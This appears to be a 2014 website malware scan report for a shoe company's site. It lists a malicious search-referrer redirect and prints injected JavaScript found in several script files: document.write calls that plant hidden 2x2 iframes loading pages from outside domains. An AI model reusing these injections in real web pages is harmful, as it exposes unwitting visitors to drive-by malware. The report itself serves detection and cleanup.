Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://jbglobal-inc.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: jbglobal-inc.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Mon, 15 Sep 2014 15:28:25 GMT Location: http://candice-accola.org/mocf.html?h=3203941 Server: Apache/2.2.22 (Unix) FrontPage/5.0.2.2635 Content-Length: 229 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://jbglobal-inc.com/ | 200 OK Content-Length: 10242 Content-Type: text/html | clean |
http://jbglobal-inc.com/scripts/user.js | 200 OK Content-Length: 28644 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohm else { coldvht3=coldvht1; } coldvht3=coldvht1; coldvht2=coldvht1; document.getElementById('colbody1').style.height = (coldvht1 - colheightofs) + 'px'; if(document.getElementById('colbody2')) { document.getElementById('colbody2').style.height = (coldvht2 - colheightofs) + 'px'; return; } if(document.getElementById('colbody3')) { document.getElementById('colbody3').style.height = (coldvht3 - colheightofs) + 'px'; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=1477317 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=1477317> Hidden iFrame found. size: 2x2 src: http://ugoodn.com/amad.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941> | ||
http://jbglobal-inc.com/scripts/jquery.js | 200 OK Content-Length: 163 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941> | ||
http://jbglobal-inc.com/scripts/simplegallery.js | 200 OK Content-Length: 19847 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohm getCookie:function(Name){ var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return null }, setCookie:function(name, value){ document.cookie = name+"=" + value + ";path=/" }, determineSlideShowHeight:function(setting){ return setting.highestImg + setting.longestDescHeight + 68 ; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941> Hidden iFrame found. size: 2x2 src: http://ugoodn.com/amad.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohmf.html?j=1477317 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohmf.html?j=1477317> | ||
http://jbglobal-inc.com/scripts/photo_album.js | 200 OK Content-Length: 314 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://ugoodn.com/amad.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ugoodn.com/amad.html?j=3203941> Hidden iFrame found. size: 2x2 src: http://candice-accola.org/mocf.html?j=3203941 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://candice-accola.org/mocf.html?j=3203941> | ||
http://jbglobal-inc.com/home.html | 200 OK Content-Length: 10241 Content-Type: text/html | clean |
http://jbglobal-inc.com/aboutus.html | 200 OK Content-Length: 10241 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 58x1 src: http://nmsbaseball.com/post.php?id=807333 <iframe name=twitter scrolling=auto frameborder=no align=center height=1 width=58 src=http://nmsbaseball.com/post.php?id=807333> | ||
http://jbglobal-inc.com/ourshoes.html | 200 OK Content-Length: 10243 Content-Type: text/html | clean |
http://jbglobal-inc.com/globaldesigns.html | 404 Not Found Content-Length: 575 Content-Type: text/html | clean |
http://jbglobal-inc.com/test404page.js | 404 Not Found Content-Length: 575 Content-Type: text/html | clean |
http://jbglobal-inc.com/links.html | 200 OK Content-Length: 10242 Content-Type: text/html | clean |
http://jbglobal-inc.com/designerevents.html | 200 OK Content-Length: 10242 Content-Type: text/html | clean |
http://jbglobal-inc.com/contactus.html | 200 OK Content-Length: 10242 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jbglobal-inc.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://jbglobal-inc.com/
Result: jbglobal-inc.com is not infected or malware details are not published yet.
Result: jbglobal-inc.com is not infected or malware details are not published yet.